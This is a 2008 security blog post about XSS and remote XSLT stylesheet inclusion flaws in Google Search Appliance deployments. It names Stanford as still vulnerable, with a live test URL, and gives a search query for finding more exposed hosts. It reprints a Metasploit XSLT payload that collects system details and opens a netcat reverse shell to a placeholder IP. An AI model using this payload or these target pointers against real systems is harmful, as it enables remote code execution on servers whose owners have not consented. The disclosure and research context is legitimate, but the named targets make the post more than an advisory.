Google Search Appliance Issues.

Publicated on : 1207488114
At the same moment I posted about a XSS issue in Mitre[2] -that uses the Google search appliance- Giorgio Maone was bloggging about something similar but on the website from Symantec[1]. Might there be a pattern here? I thought that Google had fixed all the cross site scripting issues and problems with the proxy stylesheet? Or did they never patched their clients? or did their clients never patched them self? Whatever the case may be, this isn't good. It means that more hosts are vulnerable if Mitre was and Symantec still is. Problem is, it doesn't stay with XSS alone, think again. In 2005 Metasploit released a proof of concept that allows to fetch a remote proxy stylesheet which allows remote XSLT Java Code Execution on the machine. If Google did not fix the XSS issues as we explain here, might there be a chance that some of the appliances are also still vulnerable to XSLT code execution? Maybe!



In any case, Standford University is still vulnerable to remote XSLT stylesheet inclusion, which makes sense that probably many more hosts are still vulnerable[5].

http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&proxystylesheet=_stylesheet_&site=stanfordit

just grab one from the net to test it:

http://www.in.gov/ai/appfiles/search/google_dwd.xml

As learned from history and Metasploit[3], this can be a very bad idea:

 

<xsl:template 
 

name="my_page_footer"
 

xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
 

xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime">
 


 

<!-- Google Mini XSLT Code Execution [metasploit] -->
 

XSLT Version: <xsl:value-of select="system-property('xsl:version')"/>
 

XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
 

XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
 

OS: <xsl:value-of select="sys:getProperty('os.name')" />
 

Version: <xsl:value-of select="sys:getProperty('os.version')" />
 

Arch: <xsl:value-of select="sys:getProperty('os.arch')" />
 

UserName: <xsl:value-of select="sys:getProperty('user.name')" />
 

UserHome: <xsl:value-of select="sys:getProperty('user.home')" />
 

UserDir: <xsl:value-of select="sys:getProperty('user.dir')" />
 

Executing command...
 

<xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}
 

255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" />
 

</span>
 

</xsl:template>

Conclusion.

Never trust 3rd party appliances, even if they are from Google and even if Google says it is secure.[4]



References:



[1] http://hackademix.net/2008/04/05/symantec-vulnerabilities-and-hard-things-to-do/

[2] http://www.0x000000.com/index.php?i=546

[3] http://metasploit.com/research/vulnerabilities/google_proxystylesheet/

[4] http://www.google.com/support/gsa/bin/answer.py?answer=15857

[5] http://www.google.com/search?q=inurl:proxystylesheet